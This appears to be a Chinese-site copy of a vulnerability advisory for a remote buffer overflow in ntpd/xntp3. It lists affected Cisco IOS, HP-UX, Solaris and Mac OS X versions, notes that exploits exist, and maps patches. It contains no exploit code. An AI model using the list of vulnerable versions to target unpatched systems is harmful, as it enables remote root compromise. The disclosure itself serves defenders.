Sun Solaris 2.6
HP HP-UX (VVOS) 11.0.4
HP HP-UX (VVOS) 10.24
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX 10.0 1
Dave Mills xntp3 5.93 e
Dave Mills xntp3 5.93 d
Dave Mills xntp3 5.93 c
Dave Mills xntp3 5.93 b
Dave Mills xntp3 5.93 a
Dave Mills xntp3 5.93
Dave Mills ntpd 4.0.99 k
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
- Slackware Linux 7.0
Dave Mills ntpd 4.0.99 j
Dave Mills ntpd 4.0.99 i
Dave Mills ntpd 4.0.99 h
Dave Mills ntpd 4.0.99 g
+ Debian Linux 2.2
Dave Mills ntpd 4.0.99 f
Dave Mills ntpd 4.0.99 e
Dave Mills ntpd 4.0.99 d
Dave Mills ntpd 4.0.99 c
Dave Mills ntpd 4.0.99 b
+ FreeBSD FreeBSD 4.2 -RELEASE
Dave Mills ntpd 4.0.99 a
Dave Mills ntpd 4.0.99
Cisco Voice Services Provisioning Tool
+ Sun Solaris 2.6
Cisco Virtual Switch Controller 3000
Cisco SC2200
Cisco PGW2200 PSTN Gateway
+ Sun Solaris 2.6
Cisco IP Manager 2.0
Cisco IP Manager 1.0
Cisco IOS 12.2YC
Cisco IOS 12.2YA
Cisco IOS 12.2XQ
Cisco IOS 12.2XQ
Cisco IOS 12.2XH
Cisco IOS 12.2XE
Cisco IOS 12.2XD
Cisco IOS 12.2XB
Cisco IOS 12.2XA
Cisco IOS 12.2T
Cisco IOS 12.2S
Cisco IOS 12.2PI
Cisco IOS 12.2PB
Cisco IOS 12.2DA
Cisco IOS 12.2BX
Cisco IOS 12.2BW
Cisco IOS 12.2B
Cisco IOS 12.2
Cisco IOS 12.1YF
Cisco IOS 12.1YD
Cisco IOS 12.1YC
Cisco IOS 12.1YB
Cisco IOS 12.1YA
Cisco IOS 12.1XZ
Cisco IOS 12.1XY
Cisco IOS 12.1XX
Cisco IOS 12.1XW
Cisco IOS 12.1XV
Cisco IOS 12.1XU
Cisco IOS 12.1XT
Cisco IOS 12.1XS
Cisco IOS 12.1XR
Cisco IOS 12.1XQ
Cisco IOS 12.1XP
Cisco IOS 12.1XM
Cisco IOS 12.1XL
Cisco IOS 12.1XK
Cisco IOS 12.1XJ
Cisco IOS 12.1XI
Cisco IOS 12.1XH
Cisco IOS 12.1XG
Cisco IOS 12.1XF
Cisco IOS 12.1XE
Cisco IOS 12.1XD
Cisco IOS 12.1XC
Cisco IOS 12.1XB
Cisco IOS 12.1XA
Cisco IOS 12.1T
Cisco IOS 12.1EZ
Cisco IOS 12.1EY
Cisco IOS 12.1EX
Cisco IOS 12.1EC
Cisco IOS 12.1E
Cisco IOS 12.1DC
Cisco IOS 12.1DB
Cisco IOS 12.1DA
Cisco IOS 12.1CX
Cisco IOS 12.1AA
Cisco IOS 12.1
Cisco IOS 12.0XV
Cisco IOS 12.0XU
Cisco IOS 12.0XS
Cisco IOS 12.0XR
Cisco IOS 12.0XQ
Cisco IOS 12.0XP
Cisco IOS 12.0XN
Cisco IOS 12.0XM
Cisco IOS 12.0XL
Cisco IOS 12.0XJ
Cisco IOS 12.0XI
Cisco IOS 12.0XH
Cisco IOS 12.0XG
Cisco IOS 12.0XF
Cisco IOS 12.0XE
Cisco IOS 12.0XD
Cisco IOS 12.0XC
Cisco IOS 12.0XB
Cisco IOS 12.0XA
Cisco IOS 12.0WT
Cisco IOS 12.0WC
Cisco IOS 12.0T
Cisco IOS 12.0ST
Cisco IOS 12.0SL
Cisco IOS 12.0SC
Cisco IOS 12.0S
Cisco IOS 12.0DC
Cisco IOS 12.0DB
Cisco IOS 12.0DA
Cisco IOS 12.0(7)XK
Cisco IOS 12.0(5)XK
Cisco IOS 12.0(14)W5(20)
Cisco IOS 12.0(13)W5(19c)
Cisco IOS 12.0(10)W5(18g)
Cisco IOS 12.0
Cisco IOS 11.3XA
Cisco IOS 11.3WA4
Cisco IOS 11.3T
Cisco IOS 11.3NA
Cisco IOS 11.3MA
Cisco IOS 11.3HA
Cisco IOS 11.3DB
Cisco IOS 11.3DA
Cisco IOS 11.3AA
Cisco IOS 11.3
Cisco IOS 11.2XA
Cisco IOS 11.2WA4
Cisco IOS 11.2SA
Cisco IOS 11.2P
Cisco IOS 11.2GS
Cisco IOS 11.2F
Cisco IOS 11.2BC
Cisco IOS 11.2
Cisco IOS 11.1IA
Cisco IOS 11.1CT
Cisco IOS 11.1CC
Cisco IOS 11.1CA
Cisco IOS 11.1AA
Cisco IOS 11.1
Cisco IOS 11.0
Cisco IOS 10.3
Cisco BTS 10200
Cisco Billing and Management Server
+ Sun Solaris 2.6
Apple Mac OS X 10.0.1
Apple Mac OS X 10.0
Cisco IOS 12.2DD
Cisco IOS 12.2(4)T
Cisco IOS 12.2(4)
Cisco IOS 12.2(3.4)BP
Cisco IOS 12.2(3)
Cisco IOS 12.2(2)XA1
Cisco IOS 12.2(2)XA
Cisco IOS 12.2(2)B
Cisco IOS 12.2(1b)
Cisco IOS 12.2(1.4)S
Cisco IOS 12.2(1.1)PI
Cisco IOS 12.2(1)XQ
Cisco IOS 12.2(1)XH
Cisco IOS 12.2(1)XE
Cisco IOS 12.2(1)XD1
Cisco IOS 12.1(9)AA
Cisco IOS 12.1(9)
Cisco IOS 12.1(8a)E
Cisco IOS 12.1(7)EC
Cisco IOS 12.1(7)CX
Cisco IOS 12.1(6)EZ2
Cisco IOS 12.1(6)EY
Cisco IOS 12.1(5)YF2
Cisco IOS 12.1(5)YD2
Cisco IOS 12.1(5)YC1
Cisco IOS 12.1(5)YB4
Cisco IOS 12.1(5)XV3
Cisco IOS 12.1(5)XS2
Cisco IOS 12.1(5)XM4
Cisco IOS 12.1(5)T9
Cisco IOS 12.1(2)XF4
Cisco IOS 12.0WC
Cisco IOS 12.0(5)YB4
Cisco IOS 12.0(5)WC2
Cisco IOS 12.0(17)ST1
Cisco IOS 12.0(17)SL2
Apple Mac OS X 10.0.2

- 不受影响的程序版本

Cisco IOS 12.2DD
Cisco IOS 12.2(4)T
Cisco IOS 12.2(4)
Cisco IOS 12.2(3.4)BP
Cisco IOS 12.2(3)
Cisco IOS 12.2(2)XA1
Cisco IOS 12.2(2)XA
Cisco IOS 12.2(2)B
Cisco IOS 12.2(1b)
Cisco IOS 12.2(1.4)S
Cisco IOS 12.2(1.1)PI
Cisco IOS 12.2(1)XQ
Cisco IOS 12.2(1)XH
Cisco IOS 12.2(1)XE
Cisco IOS 12.2(1)XD1
Cisco IOS 12.1(9)AA
Cisco IOS 12.1(9)
Cisco IOS 12.1(8a)E
Cisco IOS 12.1(7)EC
Cisco IOS 12.1(7)CX
Cisco IOS 12.1(6)EZ2
Cisco IOS 12.1(6)EY
Cisco IOS 12.1(5)YF2
Cisco IOS 12.1(5)YD2
Cisco IOS 12.1(5)YC1
Cisco IOS 12.1(5)YB4
Cisco IOS 12.1(5)XV3
Cisco IOS 12.1(5)XS2
Cisco IOS 12.1(5)XM4
Cisco IOS 12.1(5)T9
Cisco IOS 12.1(2)XF4
Cisco IOS 12.0WC
Cisco IOS 12.0(5)YB4
Cisco IOS 12.0(5)WC2
Cisco IOS 12.0(17)ST1
Cisco IOS 12.0(17)SL2
Apple Mac OS X 10.0.2

- 漏洞讨论

NTP, the Network Time Protocol, is used to synchronize the time between a computer and another system or time reference. It uses UDP as a transport protocol. There are two protocol versions in use: NTP v3 and NTP v4. The 'ntpd' daemon implementing version 3 is called 'xntp3'; the version implementing version 4 is called 'ntp'.

On UNIX systems, the 'ntpd' daemon is available to regularly synchronize system time with internet time servers.

Many versions of 'ntpd' are prone to a remotely exploitable buffer-overflow issue. A remote attacker may be able to crash the daemon or execute arbitrary code on the host.

If successful, the attacker may gain root access on the victim host or may denial NTP service on the affected host.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Przemyslaw Frasunek <venglin@freebsd.lublin.pl> has written an exploit for this vulnerability.

- 解决方案

Several vendors have released patches or upgrades for their distributions of 'ntpd' or software including code from 'ntpd'.

Please see the references for details.


Cisco IOS 12.0SC
  • Cisco IOS 12.0(16)SC


Cisco IOS 12.0XA
  • Cisco IOS 12.1(9)


Cisco IOS 12.1XD
  • Cisco IOS 12.2(1b)

  • Cisco IOS 12.2(3)


Cisco IOS 12.1XQ
  • Cisco IOS 12.2(1b)


Cisco IOS 12.1XJ
  • Cisco IOS 12.1(5)YB4


Cisco IOS 12.1XI
  • Cisco IOS 12.2(1b)

  • Cisco IOS 12.2(3)


Cisco IOS 12.1XS
  • Cisco IOS 12.1(5)XS2


Cisco IOS 12.2XE
  • Cisco IOS 12.2(1)XE


Cisco IOS 11.3WA4
  • Cisco IOS 12.0WA


Cisco IOS 12.0XB
  • Cisco IOS 12.1(9)


Cisco IOS 12.2S
  • Cisco IOS 12.2(1.4)S


Cisco IOS 12.1T
  • Cisco IOS 12.1(5)T9

  • Cisco IOS 12.2(1b)

  • Cisco IOS 12.2(3)


Cisco IOS 12.1XV
  • Cisco IOS 12.1(5)XV3


Sun Solaris 8_sparc

Cisco IOS 11.0
  • Cisco IOS 12.0(18)


Cisco IOS 12.0XG
  • Cisco IOS 12.1(9)


Cisco IOS 11.3HA
  • Cisco IOS 12.0(18)


Cisco IOS 12.0ST
  • Cisco IOS 12.0(17)ST1


Cisco IOS 12.1YD
  • Cisco IOS 12.1(5)YD2


Cisco IOS 12.0(14)W5(20)
  • Cisco IOS 12.0(18)W5(22)


Cisco IOS 12.0XS
  • Cisco IOS 12.1(8a)E


Cisco IOS 11.3
  • Cisco IOS 12.0(18)


Cisco IOS 12.1XM
  • Cisco IOS 12.1(5)XM4


Cisco IOS 11.2SA
  • Cisco IOS 12.0W


Cisco IOS 12.1AA
  • Cisco IOS 12.1(9)AA


Cisco IOS 11.3XA
  • Cisco IOS 12.0(18)


Cisco IOS 12.1XL
  • Cisco IOS 12.2(1b)

  • Cisco IOS 12.2(3)


Cisco IOS 12.1XT
  • Cisco IOS 12.1(5)YB4


Cisco IOS 12.1EC
  • Cisco IOS 12.1(7)EC


Cisco IOS 11.1CC
  • Cisco IOS 11.1(36)CC2


Cisco IOS 12.0XU
  • Cisco IOS 12.0WC


Cisco IOS 11.2F
  • Cisco IOS 12.0(18)


Cisco IOS 12.1DC
  • Cisco IOS 12.2(2)B


Cisco IOS 11.2P
  • Cisco IOS 12.0(18)


Cisco IOS 12.0XN
  • Cisco IOS 12.1(9)


Cisco IOS 12.0XH
  • Cisco IOS 12.1(9)


Cisco IOS 12.0DC
  • Cisco IOS 12.1DC


Cisco IOS 12.0(10)W5(18g)
  • Cisco IOS 12.0(18)W5(22a)


Cisco IOS 12.0T
  • Cisco IOS 12.1(9)


Cisco IOS 11.3NA
  • Cisco IOS 12.1(9)


Cisco IOS 11.2
  • Cisco IOS 11.2(26a)


Cisco IOS 12.2XD
  • Cisco IOS 12.2(1)XD1


Cisco IOS 11.3AA
  • Cisco IOS 12.1(9)


Cisco IOS 12.1YB
  • Cisco IOS 12.1(5)YB4


Sun Solaris 7.0

Cisco IOS 11.1
  • Cisco IOS 12.0(18)


Cisco IOS 12.2XQ
  • Cisco IOS 12.2(1)XQ


Cisco IOS 11.2GS
  • Cisco IOS 12.0(18)


Cisco IOS 12.2PB
  • Cisco IOS 12.2(3.4)BP


Cisco IOS 11.1IA
  • Cisco IOS 12.2(3)


Cisco IOS 12.0XD
  • Cisco IOS 12.1(9)


Cisco IOS 12.1EY
  • Cisco IOS 12.1(6)EY


Cisco IOS 12.1XR
  • Cisco IOS 12.1(5)YD2


Cisco IOS 12.0XI
  • Cisco IOS 12.1(9)


Cisco IOS 12.0SL
  • Cisco IOS 12.0(17)SL2

  • Cisco IOS 12.0ST


Cisco IOS 12.1EX
  • Cisco IOS 12.1(8a)E


Cisco IOS 12.2T
  • Cisco IOS 12.2(4)T


Cisco IOS 12.0XC
  • Cisco IOS 12.1(9)


Cisco IOS 12.1XA
  • Cisco IOS 12.2(1b)

  • Cisco IOS 12.2(3)


Cisco IOS 12.1XW
  • Cisco IOS 12.2DD


Cisco IOS 12.2PI
  • Cisco IOS 12.2(1.1)PI


HP HP-UX 10.0 1
  • HP PHNE_23717


HP HP-UX 10.20
  • HP PHNE_23717


HP HP-UX 11.0

HP HP-UX (VVOS) 11.0.4
  • HP PHNE_24077


HP HP-UX 11.11
  • HP PHNE_22722


Dave Mills ntpd 4.0.99 h

Dave Mills ntpd 4.0.99 b

Dave Mills ntpd 4.0.99 j

Dave Mills ntpd 4.0.99 i

Dave Mills ntpd 4.0.99 f

Dave Mills ntpd 4.0.99 k

Dave Mills ntpd 4.0.99 d

Dave Mills ntpd 4.0.99

Dave Mills ntpd 4.0.99 g

Dave Mills xntp3 5.93 e

Dave Mills xntp3 5.93 d

Dave Mills xntp3 5.93 b

Dave Mills xntp3 5.93 c

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站